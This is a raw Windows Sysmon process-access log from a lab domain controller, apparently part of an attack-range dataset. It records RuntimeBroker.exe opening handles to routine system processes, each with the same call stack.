12:02:30.387{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006586Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:30.387{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D2-6064-B500-00000000AE01}5416C:\Windows\system32\DllHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006585Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:30.387{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64C8-6064-AB00-00000000AE01}5080C:\Windows\system32\rundll32.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006584Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:30.387{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006583Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:30.387{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64C4-6064-A200-00000000AE01}3108C:\Windows\system32\userinit.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006582Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:30.387{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64C4-6064-9D00-00000000AE01}5112C:\Windows\system32\svchost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006581Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:30.387{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64C3-6064-9A00-00000000AE01}3164C:\Windows\System32\rdpclip.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006580Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:30.387{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-6497-6064-8300-00000000AE01}4472C:\Windows\system32\conhost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006579Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:30.387{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-6497-6064-8200-00000000AE01}4432C:\Windows\system32\WinrsHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006578Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:30.387{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006577Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:30.387{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006576Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:30.387{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D2-6064-B500-00000000AE01}5416C:\Windows\system32\DllHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006575Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:30.387{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64C8-6064-AB00-00000000AE01}5080C:\Windows\system32\rundll32.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006574Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:30.387{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006573Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:30.387{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64C4-6064-A200-00000000AE01}3108C:\Windows\system32\userinit.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006572Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:30.387{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64C4-6064-9D00-00000000AE01}5112C:\Windows\system32\svchost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006571Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:30.387{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64C3-6064-9A00-00000000AE01}3164C:\Windows\System32\rdpclip.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006570Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:30.387{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-6497-6064-8300-00000000AE01}4472C:\Windows\system32\conhost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006569Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:30.387{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-6497-6064-8200-00000000AE01}4432C:\Windows\system32\WinrsHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006568Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:30.387{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006567Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
